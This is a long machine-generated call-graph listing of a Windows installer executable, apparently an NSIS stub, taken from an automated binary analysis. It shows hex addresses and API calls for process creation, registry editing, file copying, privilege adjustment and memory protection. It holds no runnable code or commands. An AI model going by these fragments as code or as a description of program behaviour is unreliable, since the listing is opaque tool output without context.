SendMessageW SendMessageW 5300->5301 5302 4045bf GetSysColor 5300->5302 5301->5296 5302->5301 5303->5298 5304->5300 5305->5288 5307 404780 SendMessageW 5306->5307 5308 40477b 5306->5308 5307->5274 5308->5307 5312 4059d8 ShellExecuteExW 5309->5312 5311 4046f7 LoadCursorW SetCursor 5311->5279 5312->5311 5313 401563 5314 402a65 5313->5314 5317 4062f7 wsprintfW 5314->5317 5316 402a6a 5317->5316 5318 401968 5319 402c15 17 API calls 5318->5319 5320 40196f 5319->5320 5321 402c15 17 API calls 5320->5321 5322 40197c 5321->5322 5323 402c37 17 API calls 5322->5323 5324 401993 lstrlenW 5323->5324 5325 4019a4 5324->5325 5326 4019e5 5325->5326 5330 4063b0 lstrcpynW 5325->5330 5328 4019d5 5328->5326 5329 4019da lstrlenW 5328->5329 5329->5326 5330->5328 4458 4027e9 4459 4027f0 4458->4459 4461 402a6a 4458->4461 4460 402c15 17 API calls 4459->4460 4462 4027f7 4460->4462 4463 402806 SetFilePointer 4462->4463 4463->4461 4464 402816 4463->4464 4466 4062f7 wsprintfW 4464->4466 4466->4461 5331 100018a9 5333 100018cc 5331->5333 5332 10001911 5335 10001272 2 API calls 5332->5335 5333->5332 5334 100018ff GlobalFree 5333->5334 5334->5332 5336 10001a87 GlobalFree GlobalFree 5335->5336 5337 40166a 5338 402c37 17 API calls 5337->5338 5339 401670 5338->5339 5340 4066f3 2 API calls 5339->5340 5341 401676 5340->5341 5342 404b6a 5343 404b96 5342->5343 5344 404b7a 5342->5344 5346 404bc9 5343->5346 5347 404b9c SHGetPathFromIDListW 5343->5347 5353 4059f6 GetDlgItemTextW 5344->5353 5349 404bac 5347->5349 5352 404bb3 SendMessageW 5347->5352 5348 404b87 SendMessageW 5348->5343 5351 40140b 2 API calls 5349->5351 5351->5352 5352->5346 5353->5348 5354 403e6c 5355 403e84 5354->5355 5356 403fbf 5354->5356 5355->5356 5357 403e90 5355->5357 5358 403fd0 GetDlgItem GetDlgItem 5356->5358 5359 404010 5356->5359 5360 403e9b SetWindowPos 5357->5360 5361 403eae 5357->5361 5362 404345 18 API calls 5358->5362 5363 40406a 5359->5363 5371 401389 2 API calls 5359->5371 5360->5361 5365 403eb3 ShowWindow 5361->5365 5366 403ecb 5361->5366 5367 403ffa SetClassLongW 5362->5367 5364 404391 SendMessageW 5363->5364 5384 403fba 5363->5384 5381 40407c 5364->5381 5365->5366 5368 403ed3 DestroyWindow 5366->5368 5369 403eed 5366->5369 5370 40140b 2 API calls 5367->5370 5422 4042ce 5368->5422 5372 403ef2 SetWindowLongW 5369->5372 5373 403f03 5369->5373 5370->5359 5374 404042 5371->5374 5372->5384 5377 403f0f GetDlgItem 5373->5377 5392 403f7a 5373->5392 5374->5363 5378 404046 SendMessageW 5374->5378 5375 40140b 2 API calls 5375->5381 5376 4042d0 DestroyWindow EndDialog 5376->5422 5382 403f22 SendMessageW IsWindowEnabled 5377->5382 5383 403f3f 5377->5383 5378->5384 5379 4043ac 8 API calls 5379->5384 5380 4042ff ShowWindow 5380->5384 5381->5375 5381->5376 5381->5384 5385 4063d2 17 API calls 5381->5385 5395 404345 18 API calls 5381->5395 5397 404345 18 API calls 5381->5397 5413 404210 DestroyWindow 5381->5413 5382->5383 5382->5384 5386 403f4c 5383->5386 5387 403f93 SendMessageW 5383->5387 5388 403f5f 5383->5388 5396 403f44 5383->5396 5385->5381 5386->5387 5386->5396 5387->5392 5390 403f67 5388->5390 5391 403f7c 5388->5391 5389 40431e SendMessageW 5389->5392 5393 40140b 2 API calls 5390->5393 5394 40140b 2 API calls 5391->5394 5392->5379 5393->5396 5394->5396 5395->5381 5396->5389 5396->5392 5398 4040f7 GetDlgItem 5397->5398 5399 404114 ShowWindow EnableWindow 5398->5399 5400 40410c 5398->5400 5423 404367 EnableWindow 5399->5423 5400->5399 5402 40413e EnableWindow 5407 404152 5402->5407 5403 404157 GetSystemMenu EnableMenuItem SendMessageW 5404 404187 SendMessageW 5403->5404 5403->5407 5404->5407 5406 403e4d 18 API calls 5406->5407 5407->5403 5407->5406 5424 40437a SendMessageW 5407->5424 5425 4063b0 lstrcpynW 5407->5425 5409 4041b6 lstrlenW 5410 4063d2 17 API calls 5409->5410 5411 4041cc SetWindowTextW 5410->5411 5412 401389 2 API calls 5411->5412 5412->5381 5414 40422a CreateDialogParamW 5413->5414 5413->5422 5415 40425d 5414->5415 5414->5422 5416 404345 18 API calls 5415->5416 5417 404268 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5416->5417 5418 401389 2 API calls 5417->5418 5419 4042ae 5418->5419 5419->5384 5420 4042b6 ShowWindow 5419->5420 5421 404391 SendMessageW 5420->5421 5421->5422 5422->5380 5422->5384 5423->5402 5424->5407 5425->5409 5426 401ced 5427 402c15 17 API calls 5426->5427 5428 401cf3 IsWindow 5427->5428 5429 401a20 5428->5429 4962 40176f 4963 402c37 17 API calls 4962->4963 4964 401776 4963->4964 4965 401796 4964->4965 4966 40179e 4964->4966 5002 4063b0 lstrcpynW 4965->5002 5003 4063b0 lstrcpynW 4966->5003 4969 40179c 4973 406644 5 API calls 4969->4973 4970 4017a9 4971 405c81 3 API calls 4970->4971 4972 4017af lstrcatW 4971->4972 4972->4969 4978 4017bb 4973->4978 4974 4066f3 2 API calls 4974->4978 4975 4017f7 4976 405e7d 2 API calls 4975->4976 4976->4978 4978->4974 4978->4975 4979 4017cd CompareFileTime 4978->4979 4980 40188d 4978->4980 4987 4063d2 17 API calls 4978->4987 4992 4063b0 lstrcpynW 4978->4992 4997 405a12 MessageBoxIndirectW 4978->4997 4998 401864 4978->4998 5001 405ea2 GetFileAttributesW CreateFileW 4978->5001 4979->4978 4981 405414 24 API calls 4980->4981 4983 401897 4981->4983 4982 405414 24 API calls 5000 401879 4982->5000 4984 4031ba 44 API calls 4983->4984 4985 4018aa 4984->4985 4986 4018be SetFileTime 4985->4986 4988 4018d0 CloseHandle 4985->4988 4986->4988 4987->4978 4989 4018e1 4988->4989 4988->5000 4990 4018e6 4989->4990 4991 4018f9 4989->4991 4993 4063d2 17 API calls 4990->4993 4994 4063d2 17 API calls 4991->4994 4992->4978 4995 4018ee lstrcatW 4993->4995 4996 401901 4994->4996 4995->4996 4999 405a12 MessageBoxIndirectW 4996->4999 4997->4978 4998->4982 4998->5000 4999->5000 5001->4978 5002->4969 5003->4970 5437 402570 5438 402c37 17 API calls 5437->5438 5439 402577 5438->5439 5442 405ea2 GetFileAttributesW CreateFileW 5439->5442 5441 402583 5442->5441 5004 401b71 5005 401bc2 5004->5005 5006 401b7e 5004->5006 5008 401bc7 5005->5008 5009 401bec GlobalAlloc 5005->5009 5007 401c07 5006->5007 5012 401b95 5006->5012 5010 4063d2 17 API calls 5007->5010 5022 4022f1 5007->5022 5008->5022 5025 4063b0 lstrcpynW 5008->5025 5011 4063d2 17 API calls 5009->5011 5014 4022eb 5010->5014 5011->5007 5023 4063b0 lstrcpynW 5012->5023 5018 405a12 MessageBoxIndirectW 5014->5018 5016 401bd9 GlobalFree 5016->5022 5017 401ba4 5024 4063b0 lstrcpynW 5017->5024 5018->5022 5020 401bb3 5026 4063b0 lstrcpynW 5020->5026 5023->5017 5024->5020 5025->5016 5026->5022 5027 4024f2 5028 402c77 17 API calls 5027->5028 5029 4024fc 5028->5029 5030 402c15 17 API calls 5029->5030 5031 402505 5030->5031 5032 402521 RegEnumKeyW 5031->5032 5033 40252d RegEnumValueW 5031->5033 5036 402885 5031->5036 5034 402549 RegCloseKey 5032->5034 5033->5034 5035 402542 5033->5035 5034->5036 5035->5034 5450 401a72 5451 402c15 17 API calls 5450->5451 5452 401a78 5451->5452 5453 402c15 17 API calls 5452->5453 5454 401a20 5453->5454 5455 401573 5456 401583 ShowWindow 5455->5456 5457 40158c 5455->5457 5456->5457 5458 40159a ShowWindow 5457->5458 5459 402abf 5457->5459 5458->5459 5460 4014f5 SetForegroundWindow 5461 402abf 5460->5461 5462 100016b6 5463 100016e5 5462->5463 5464 10001b18 22 API calls 5463->5464 5465 100016ec 5464->5465 5466 100016f3 5465->5466 5467 100016ff 5465->5467 5468 10001272 2 API calls 5466->5468 5469 10001726 5467->5469 5470 10001709 5467->5470 5478 100016fd 5468->5478 5472 10001750 5469->5472 5473 1000172c 5469->5473 5471 1000153d 3 API calls 5470->5471 5475 1000170e 5471->5475 5474 1000153d 3 API calls 5472->5474 5476 100015b4 3 API calls 5473->5476 5474->5478 5479 100015b4 3 API calls 5475->5479 5477 10001731 5476->5477 5480 10001272 2 API calls 5477->5480 5481 10001714 5479->5481 5482 10001737 GlobalFree 5480->5482 5483 10001272 2 API calls 5481->5483 5482->5478 5484 1000174b GlobalFree 5482->5484 5485 1000171a GlobalFree 5483->5485 5484->5478 5485->5478 5486 401e77 5487 402c37 17 API calls 5486->5487 5488 401e7d 5487->5488 5489 402c37 17 API calls 5488->5489 5490 401e86 5489->5490 5491 402c37 17 API calls 5490->5491 5492 401e8f 5491->5492 5493 402c37 17 API calls 5492->5493 5494 401e98 5493->5494 5495 401423 24 API calls 5494->5495 5496 401e9f 5495->5496 5503 4059d8 ShellExecuteExW 5496->5503 5498 401ee1 5499 40683b 5 API calls 5498->5499 5501 402885 5498->5501 5500 401efb CloseHandle 5499->5500 5500->5501 5503->5498 5504 406e77 5508 40693e 5504->5508 5505 4072a9 5506 4069c8 GlobalAlloc 5506->5505 5506->5508 5507 4069bf GlobalFree 5507->5506 5508->5505 5508->5506 5508->5507 5508->5508 5509 406a36 GlobalFree 5508->5509 5510 406a3f GlobalAlloc 5508->5510 5509->5510 5510->5505 5510->5508 5511 10002238 5512 10002296 5511->5512 5513 100022cc 5511->5513 5512->5513 5514 100022a8 GlobalAlloc 5512->5514 5514->5512 5515 40167b 5516 402c37 17 API calls 5515->5516 5517 401682 5516->5517 5518 402c37 17 API calls 5517->5518 5519 40168b 5518->5519 5520 402c37 17 API calls 5519->5520 5521 401694 MoveFileW 5520->5521 5522 4016a7 5521->5522 5528 4016a0 5521->5528 5523 40224a 5522->5523 5524 4066f3 2 API calls 5522->5524 5526 4016b6 5524->5526 5525 401423 24 API calls 5525->5523 5526->5523 5527 406176 36 API calls 5526->5527 5527->5528 5528->5525 5529 403a7c 5530 403a87 5529->5530 5531 403a8b 5530->5531 5532 403a8e GlobalAlloc 5530->5532 5532->5531 5533 1000103d 5534 1000101b 5 API calls 5533->5534 5535 10001056 5534->5535 5049 40247e 5050 402c77 17 API calls 5049->5050 5051 402488 5050->5051 5052 402c37 17 API calls 5051->5052 5053 402491 5052->5053 5054 40249c RegQueryValueExW 5053->5054 5058 402885 5053->5058 5055 4024c2 RegCloseKey 5054->5055 5056 4024bc 5054->5056 5055->5058 5056->5055 5060 4062f7 wsprintfW 5056->5060 5060->5055 5536 4020fe 5537 402c37 17 API calls 5536->5537 5538 402105 5537->5538 5539 402c37 17 API calls 5538->5539 5540 40210f 5539->5540 5541 402c37 17 API calls 5540->5541 5542 402119 5541->5542 5543 402c37 17 API calls 5542->5543 5544 402123 5543->5544 5545 402c37 17 API calls 5544->5545 5546 40212d 5545->5546 5547 40216c CoCreateInstance 5546->5547 5548 402c37 17 API calls 5546->5548 5551 40218b 5547->5551 5548->5547 5549 401423 24 API calls 5550 40224a 5549->5550 5551->5549 5551->5550 5552 4019ff 5553 402c37 17 API calls 5552->5553 5554 401a06 5553->5554 5555 402c37 17 API calls 5554->5555 5556 401a0f 5555->5556 5557 401a16 lstrcmpiW 5556->5557 5558 401a28 lstrcmpW 5556->5558 5559 401a1c 5557->5559 5558->5559 4111 401f00 4126 402c37 4111->4126 4120 401f2b 4122 401f30 4120->4122 4123 401f3b 4120->4123 4121 402885 4151 4062f7 wsprintfW 4122->4151 4125 401f39 CloseHandle 4123->4125 4125->4121 4127 402c43 4126->4127 4152 4063d2 4127->4152 4130 401f06 4132 405414 4130->4132 4133 40542f 4132->4133 4141 401f10 4132->4141 4134 40544b lstrlenW 4133->4134 4135 4063d2 17 API calls 4133->4135 4136 405474 4134->4136 4137 405459 lstrlenW 4134->4137 4135->4134 4139 405487 4136->4139 4140 40547a SetWindowTextW 4136->4140 4138 40546b lstrcatW 4137->4138 4137->4141 4138->4136 4139->4141 4142 40548d SendMessageW SendMessageW SendMessageW 4139->4142 4140->4139 4143 405995 CreateProcessW 4141->4143 4142->4141 4144 401f16 4143->4144 4145 4059c8 CloseHandle 4143->4145 4144->4121 4144->4125 4146 40683b WaitForSingleObject 4144->4146 4145->4144 4147 406855 4146->4147 4148 406867 GetExitCodeProcess 4147->4148 4194 4067c6 4147->4194 4148->4120 4151->4125 4153 4063df 4152->4153 4154 40662a 4153->4154 4157 4065f8 lstrlenW 4153->4157 4158 4063d2 10 API calls 4153->4158 4161 40650d GetSystemDirectoryW 4153->4161 4163 406520 GetWindowsDirectoryW 4153->4163 4164 406644 5 API calls 4153->4164 4165 4063d2 10 API calls 4153->4165 4166 40659b lstrcatW 4153->4166 4167 406554 SHGetSpecialFolderLocation 4153->4167 4178 40627e 4153->4178 4183 4062f7 wsprintfW 4153->4183 4184 4063b0 lstrcpynW 4153->4184 4155 402c64 4154->4155 4185 4063b0 lstrcpynW 4154->4185 4155->4130 4169 406644 4155->4169 4157->4153 4158->4157 4161->4153 4163->4153 4164->4153 4165->4153 4166->4153 4167->4153 4168 40656c SHGetPathFromIDListW CoTaskMemFree 4167->4168 4168->4153 4175 406651 4169->4175 4170 4066c7 4171 4066cc CharPrevW 4170->4171 4173 4066ed 4170->4173 4171->4170 4172 4066ba CharNextW 4172->4170 4172->4175 4173->4130 4175->4170 4175->4172 4176 4066a6 CharNextW 4175->4176 4177 4066b5 CharNextW 4175->4177 4190 405cae 4175->4190 4176->4175 4177->4172 4186 40621d 4178->4186 4181 4062b2 RegQueryValueExW RegCloseKey 4182 4062e2 4181->4182 4182->4153 4183->4153 4184->4153 4185->4155 4187 40622c 4186->4187 4188 406230 4187->4188 4189 406235 RegOpenKeyExW 4187->4189 4188->4181 4188->4182 4189->4188 4191 405cb4 4190->4191 4192 405cca 4191->4192 4193 405cbb CharNextW 4191->4193 4192->4175 4193->4191 4195 4067e3 PeekMessageW 4194->4195 4196 4067f3 WaitForSingleObject 4195->4196 4197 4067d9 DispatchMessageW 4195->4197 4196->4147 4197->4195 5560 401000 5561 401037 BeginPaint GetClientRect 5560->5561 5562 40100c DefWindowProcW 5560->5562 5564 4010f3 5561->5564 5565 401179 5562->5565 5566 401073 CreateBrushIndirect FillRect DeleteObject 5564->5566 5567 4010fc 5564->5567 5566->5564 5568 401102 CreateFontIndirectW 5567->5568 5569 401167 EndPaint 5567->5569 5568->5569 5570 401112 6 API calls 5568->5570 5569->5565 5570->5569 4372 100027c2 4373 10002812 4372->4373 4374 100027d2 VirtualProtect 4372->4374 4374->4373 5571 401503 5572 40150b 5571->5572 5574 40151e 5571->5574 5573 402c15 17 API calls 5572->5573 5573->5574 4414 402306 4415 40230e 4414->4415 4418 402314 4414->4418 4416 402c37 17 API calls 4415->4416 4416->4418 4417 402322 4420 402c37 17 API calls 4417->4420 4422 402330 4417->4422 4418->4417 4419 402c37 17 API calls 4418->4419 4419->4417 4420->4422 4421 402c37 17 API calls 4423 402339 WritePrivateProfileStringW 4421->4423 4422->4421 5582 401f86 5583 402c37 17 API calls 5582->5583 5584 401f8d 5583->5584 5585 40678a 5 API calls 5584->5585 5586 401f9c 5585->5586 5587 401fb8 GlobalAlloc 5586->5587 5588 402020 5586->5588 5587->5588 5589 401fcc 5587->5589 5590 40678a 5 API calls 5589->5590 5591 401fd3 5590->5591 5592 40678a 5 API calls 5591->5592 5593 401fdd 5592->5593 5593->5588 5597 4062f7 wsprintfW 5593->5597 5595 402012 5598 4062f7 wsprintfW 5595->5598 5597->5595 5598->5588 4424 402388 4425 402390 4424->4425 4426 4023bb 4424->4426 4440 402c77 4425->4440 4428 402c37 17 API calls 4426->4428 4430 4023c2 4428->4430 4436 402cf5 4430->4436 4431 4023a1 4433 402c37 17 API calls 4431->4433 4435 4023a8 RegDeleteValueW RegCloseKey 4433->4435 4434 4023cf 4435->4434 4437 402d0b 4436->4437 4438 402d21 4437->4438 4445 402d2a 4437->4445 4438->4434 4441 402c37 17 API calls 4440->4441 4442 402c8e 4441->4442 4443 40621d RegOpenKeyExW 4442->4443 4444 402397 4443->4444 4444->4431 4444->4434 4446 40621d RegOpenKeyExW 4445->4446 4447 402d58 4446->4447 4448 402dd0 4447->4448 4453 402d5c 4447->4453 4448->4438 4449 402d7e RegEnumKeyW 4450 402d95 RegCloseKey 4449->4450 4449->4453 4451 40678a 5 API calls 4450->4451 4454 402da5 4451->4454 4452 402db6 RegCloseKey 4452->4448 4453->4449 4453->4450 4453->4452 4455 402d2a 6 API calls 4453->4455 4456 402dc4 RegDeleteKeyW 4454->4456 4457 402da9 4454->4457 4455->4453 4456->4448 4457->4448 5599 405388 5600 405398 5599->5600 5601 4053ac 5599->5601 5602 4053f5 5600->5602 5603 40539e 5600->5603 5604 4053b4 IsWindowVisible 5601->5604 5610 4053cb 5601->5610 5605 4053fa CallWindowProcW 5602->5605 5606 404391 SendMessageW 5603->5606 5604->5602 5607 4053c1 5604->5607 5608 4053a8 5605->5608 5606->5608 5612 404cde SendMessageW 5607->5612 5610->5605 5617 404d5e 5610->5617 5613 404d01 GetMessagePos ScreenToClient SendMessageW 5612->5613 5614 404d3d SendMessageW 5612->5614 5615 404d35 5613->5615 5616 404d3a 5613->5616 5614->5615 5615->5610 5616->5614 5626 4063b0 lstrcpynW 5617->5626 5619 404d71 5627 4062f7 wsprintfW 5619->5627 5621 404d7b 5622 40140b 2 API calls 5621->5622 5623 404d84 5622->5623 5628 4063b0 lstrcpynW 5623->5628 5625 404d8b 5625->5602 5626->5619 5627->5621 5628->5625 4467 403489 SetErrorMode GetVersion 4468 4034c8 4467->4468 4469 4034ce 4467->4469 4470 40678a 5 API calls 4468->4470 4471 40671a 3 API calls 4469->4471 4470->4469 4472 4034e4 lstrlenA 4471->4472 4472->4469 4473 4034f4 4472->4473 4474 40678a 5 API calls 4473->4474 4475 4034fb 4474->4475 4476 40678a 5 API calls 4475->4476 4477 403502 4476->4477 4478 40678a 5 API calls 4477->4478 4479 40350e #17 OleInitialize SHGetFileInfoW 4478->4479 4558 4063b0 lstrcpynW 4479->4558 4482 40355a GetCommandLineW 4559 4063b0 lstrcpynW 4482->4559 4484 40356c GetModuleHandleW 4485 403584 4484->4485 4486 405cae CharNextW 4485->4486 4487 403593 CharNextW 4486->4487 4488 4036bd GetTempPathW 4487->4488 4498 4035ac 4487->4498 4560 403458 4488->4560 4490 4036d5 4491 4036d9 GetWindowsDirectoryW lstrcatW 4490->4491 4492 40372f DeleteFileW 4490->4492 4493 403458 12 API calls 4491->4493 4570 402f14 GetTickCount GetModuleFileNameW 4492->4570 4496 4036f5 4493->4496 4494 405cae CharNextW 4494->4498 4496->4492 4499 4036f9 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4496->4499 4497 403743 4504 4037e6 4497->4504 4508 405cae CharNextW 4497->4508 4553 4037f6 4497->4553 4498->4494 4501 4036a8 4498->4501 4503 4036a6 4498->4503 4502 403458 12 API calls 4499->4502 4657 4063b0 lstrcpynW 4501->4657 4506 403727 4502->4506 4503->4488 4600 403abe 4504->4600 4506->4492 4506->4553 4521 403762 4508->4521 4510 403930 4513 4039b4 ExitProcess 4510->4513 4514 403938 GetCurrentProcess OpenProcessToken 4510->4514 4511 403810 4669 405a12 4511->4669 4519 403950 LookupPrivilegeValueW AdjustTokenPrivileges 4514->4519 4520 403984 4514->4520 4516 4037c0 4522 405d89 18 API calls 4516->4522 4517 403826 4523 40597d 5 API calls 4517->4523 4519->4520 4524 40678a 5 API calls 4520->4524 4521->4516 4521->4517 4525 4037cc 4522->4525 4526 40382b lstrcatW 4523->4526 4527 40398b 4524->4527 4525->4553 4658 4063b0 lstrcpynW 4525->4658 4528 403847 lstrcatW lstrcmpiW 4526->4528 4529 40383c lstrcatW 4526->4529 4530 4039a0 ExitWindowsEx 4527->4530 4531 4039ad 4527->4531 4533 403863 4528->4533 4528->4553 4529->4528 4530->4513 4530->4531 4675 40140b 4531->4675 4536 403868 4533->4536 4537 40386f 4533->4537 4535 4037db 4659 4063b0 lstrcpynW 4535->4659 4540 4058e3 4 API calls 4536->4540 4538 405960 2 API calls 4537->4538 4541 403874 SetCurrentDirectoryW 4538->4541 4542 40386d 4540->4542 4543 403884 4541->4543 4544 40388f 4541->4544 4542->4541 4673 4063b0 lstrcpynW 4543->4673 4674 4063b0 lstrcpynW 4544->4674 4547 4063d2 17 API calls 4548 4038ce DeleteFileW 4547->4548 4549 4038db CopyFileW 4548->4549 4554 40389d 4548->4554 4549->4554 4550 403924 4551 406176 36 API calls 4550->4551 4551->4553 4552 406176 36 API calls 4552->4554 4660 4039cc 4553->4660 4554->4547 4554->4550 4554->4552 4555 4063d2 17 API calls 4554->4555 4556 405995 2 API calls 4554->4556 4557 40390f CloseHandle 4554->4557 4555->4554 4556->4554 4557->4554 4558->4482 4559->4484 4561 406644 5 API calls 4560->4561 4562 403464 4561->4562 4563 40346e 4562->4563 4564 405c81 3 API calls 4562->4564 4563->4490 4565 403476 4564->4565 4566 405960 2 API calls 4565->4566 4567 40347c 4566->4567 4678 405ed1 4567->4678 4682 405ea2 GetFileAttributesW CreateFileW 4570->4682 4572 402f57 4599 402f64 4572->4599 4683 4063b0 lstrcpynW 4572->4683 4574 402f7a 4575 405ccd 2 API calls 4574->4575 4576 402f80 4575->4576 4684 4063b0 lstrcpynW 4576->4684 4578 402f8b GetFileSize 4579 40308c 4578->4579 4597 402fa2 4578->4597 4685 402e72 4579->4685 4583 403127 4586 402e72 32 API calls 4583->4586 4584 4030cf GlobalAlloc 4585 4030e6 4584->4585 4590 405ed1 2 API calls 4585->4590 4586->4599 4588 4030b0 4591 40342b ReadFile 4588->4591 4589 402e72 32 API calls 4589->4597 4593 4030f7 CreateFileW 4590->4593 4592 4030bb 4591->4592 4592->4584 4592->4599 4594 403131 4593->4594 4593->4599 4700 403441 SetFilePointer 4594->4700 4596 40313f 4701 4031ba 4596->4701 4597->4579 4597->4583 4597->4589 4597->4599 4716 40342b 4597->4716 4599->4497 4601 40678a 5 API calls 4600->4601 4602 403ad2 4601->4602 4603 403ad8 4602->4603 4604 403aea 4602->4604 4752 4062f7 wsprintfW 4603->4752 4605 40627e 3 API calls 4604->4605 4606 403b1a 4605->4606 4607 403b39 lstrcatW 4606->4607 4609 40627e 3 API calls 4606->4609 4610 403ae8 4607->4610 4609->4607 4744 403d94 4610->4744 4613 405d89 18 API calls 4614 403b6b 4613->4614 4615 403bff 4614->4615 4617 40627e 3 API calls 4614->4617 4616 405d89 18 API calls 4615->4616 4618 403c05 4616->4618 4620 403b9d 4617->4620 4619 403c15 LoadImageW 4618->4619 4621 4063d2 17 API calls 4618->4621 4622 403cbb 4619->4622 4623 403c3c RegisterClassW 4619->4623 4620->4615 4624 403bbe lstrlenW 4620->4624 4627 405cae CharNextW 4620->4627 4621->4619 4626 40140b 2 API calls 4622->4626 4625 403c72 SystemParametersInfoW CreateWindowExW 4623->4625 4656 403cc5 4623->4656 4628 403bf2 4624->4628 4629 403bcc lstrcmpiW 4624->4629 4625->4622 4630 403cc1 4626->4630 4631 403bbb 4627->4631 4633 405c81 3 API calls 4628->4633 4629->4628 4632 403bdc GetFileAttributesW 4629->4632 4635 403d94 18 API calls 4630->4635 4630->4656 4631->4624 4634 403be8 4632->4634 4636 403bf8 4633->4636 4634->4628 4637 405ccd 2 API calls 4634->4637 4638 403cd2 4635->4638 4753 4063b0 lstrcpynW 4636->4753 4637->4628 4640 403d61 4638->4640 4641 403cde ShowWindow 4638->4641 4754 4054e7 OleInitialize 4640->4754 4643 40671a 3 API calls 4641->4643 4645 403cf6 4643->4645 4644 403d67 4646 403d83 4644->4646 4647 403d6b 4644->4647 4648 403d04 GetClassInfoW 4645->4648 4650 40671a 3 API calls 4645->4650 4649 40140b 2 API calls 4646->4649 4654 40140b 2 API calls 4647->4654 4647->4656 4651 403d18 GetClassInfoW RegisterClassW 4648->4651 4652 403d2e DialogBoxParamW 4648->4652 4649->4656 4650->4648 4651->4652 4653 40140b 2 API calls 4652->4653 4655 403d56 4653->4655 4654->4656 4655->4656 4656->4553 4657->4503 4658->4535 4659->4504 4661 4039e7 4660->4661 4662 4039dd CloseHandle 4660->4662 4663 4039f1 CloseHandle 4661->4663 4664 4039fb 4661->4664 4662->4661 4663->4664 4772 403a29 4664->4772 4667 405abe 67 API calls 4668 4037ff OleUninitialize 4667->4668 4668->4510 4668->4511 4670 405a27 4669->4670 4671 40381e ExitProcess 4670->4671 4672 405a3b MessageBoxIndirectW 4670->4672 4672->4671 4673->4544 4674->4554 4676 401389 2 API calls 4675->4676 4677 401420 4676->4677 4677->4513 4679 405ede GetTickCount GetTempFileNameW 4678->4679 4680 405f14 4679->4680 4681 403487 4679->4681 4680->4679 4680->4681 4681->4490 4682->4572 4683->4574 4684->4578 4686 402e83 4685->4686 4687 402e9b 4685->4687 4688 402e93 4686->4688 4689 402e8c DestroyWindow 4686->4689 4690 402ea3 4687->4690 4691 402eab GetTickCount 4687->4691 4688->4584 4688->4599 4719 403441 SetFilePointer 4688->4719 4689->4688 4693 4067c6 2 API calls 4690->4693 4691->4688 4692 402eb9 4691->4692 4694 402ec1 4692->4694 4695 402eee CreateDialogParamW ShowWindow 4692->4695 4693->4688 4694->4688 4720 402e56 4694->4720 4695->4688 4697 402ecf wsprintfW 4698 405414 24 API calls 4697->4698 4699 402eec 4698->4699 4699->4688 4700->4596 4702 4031e5 4701->4702 4703 4031c9 SetFilePointer 4701->4703 4723 4032c2 GetTickCount 4702->4723 4703->4702 4706 405f25 ReadFile 4707 403205 4706->4707 4708 4032c2 42 API calls 4707->4708 4715 403282 4707->4715 4709 40321c 4708->4709 4710 403288 ReadFile 4709->4710 4713 40322b 4709->4713 4709->4715 4710->4715 4712 405f25 ReadFile 4712->4713 4713->4712 4714 405f54 WriteFile 4713->4714 4713->4715 4714->4713 4715->4599 4717 405f25 ReadFile 4716->4717 4718 40343e 4717->4718 4718->4597 4719->4588 4721 402e65 4720->4721 4722 402e67 MulDiv 4720->4722 4721->4722 4722->4697 4724 4032f0 4723->4724 4725 40341a 4723->4725 4736 403441 SetFilePointer 4724->4736 4726 402e72 32 API calls 4725->4726 4732 4031ec 4726->4732 4728 4032fb SetFilePointer 4734 403320 4728->4734 4729 40342b ReadFile 4729->4734 4731 402e72 32 API calls 4731->4734 4732->4706 4732->4715 4733 405f54 WriteFile 4733->4734 4734->4729 4734->4731 4734->4732 4734->4733 4735 4033fb SetFilePointer 4734->4735 4737 40690b 4734->4737 4735->4725 4736->4728 4738 406930 4737->4738 4741 406938 4737->4741 4738->4734 4739 4069c8 GlobalAlloc 4739->4738 4739->4741 4740 4069bf GlobalFree 4740->4739 4741->4738 4741->4739 4741->4740 4742 406a36 GlobalFree 4741->4742 4743 406a3f GlobalAlloc 4741->4743 4742->4743 4743->4738 4743->4741 4745 403da8 4744->4745 4761 4062f7 wsprintfW 4745->4761 4747 403e19 4762 403e4d 4747->4762 4749 403b49 4749->4613 4750 403e1e 4750->4749 4751 4063d2 17 API calls 4750->4751 4751->4750 4752->4610 4753->4615 4765 404391 4754->4765 4756 40550a 4760 405531 4756->4760 4768 401389 4756->4768 4757 404391 SendMessageW 4758 405543 OleUninitialize 4757->4758 4758->4644 4760->4757 4761->4747 4763 4063d2 17 API calls 4762->4763 4764 403e5b SetWindowTextW 4763->4764 4764->4750 4766 4043a9 4765->4766 4767 40439a SendMessageW 4765->4767 4766->4756 4767->4766 4770 401390 4768->4770 4769 4013fe 4769->4756 4770->4769 4771 4013cb MulDiv SendMessageW 4770->4771 4771->4770 4773 403a37 4772->4773 4774 403a00 4773->4774 4775 403a3c FreeLibrary GlobalFree 4773->4775 4774->4667 4775->4774 4775->4775 4776 401389 4778 401390 4776->4778 4777 4013fe 4778->4777 4779 4013cb MulDiv SendMessageW 4778->4779 4779->4778 5629 40190c 5630 401943 5629->5630 5631 402c37 17 API calls 5630->5631 5632 401948 5631->5632 5633 405abe 67 API calls 5632->5633 5634 401951 5633->5634 5635 401d0e 5636 402c15 17 API calls 5635->5636 5637 401d15 5636->5637 5638 402c15 17 API calls 5637->5638 5639 401d21 GetDlgItem 5638->5639 5640 40258c 5639->5640 5641 1000164f 5642 10001516 GlobalFree 5641->5642 5644 10001667 5642->5644 5643 100016ad GlobalFree 5644->5643 5645 10001682 5644->5645 5646 10001699 VirtualFree 5644->5646 5645->5643 5646->5643 5647 40190f 5648 402c37 17 API calls 5647->5648 5649 401916 5648->5649 5650 405a12 MessageBoxIndirectW 5649->5650 5651 40191f 5650->5651 5652 404d90 GetDlgItem GetDlgItem 5653 404de2 7 API calls 5652->5653 5661 404ffb 5652->5661 5654 404e85 DeleteObject 5653->5654 5655 404e78 SendMessageW 5653->5655 5656 404e8e 5654->5656 5655->5654 5658 404ec5 5656->5658 5660 4063d2 17 API calls 5656->5660 5657 4050df 5659 40518b 5657->5659 5668 405138 SendMessageW 5657->5668 5695 404fee 5657->5695 5662 404345 18 API calls 5658->5662 5664 405195 SendMessageW 5659->5664 5665 40519d 5659->5665 5666 404ea7 SendMessageW SendMessageW 5660->5666 5661->5657 5663 40506c 5661->5663 5671 404cde 5 API calls 5661->5671 5667 404ed9 5662->5667 5663->5657 5670 4050d1 SendMessageW 5663->5670 5664->5665 5676 4051b6 5665->5676 5677 4051af ImageList_Destroy 5665->5677 5688 4051c6 5665->5688 5666->5656 5672 404345 18 API calls 5667->5672 5674 40514d SendMessageW 5668->5674 5668->5695 5669 4043ac 8 API calls 5675 405381 5669->5675 5670->5657 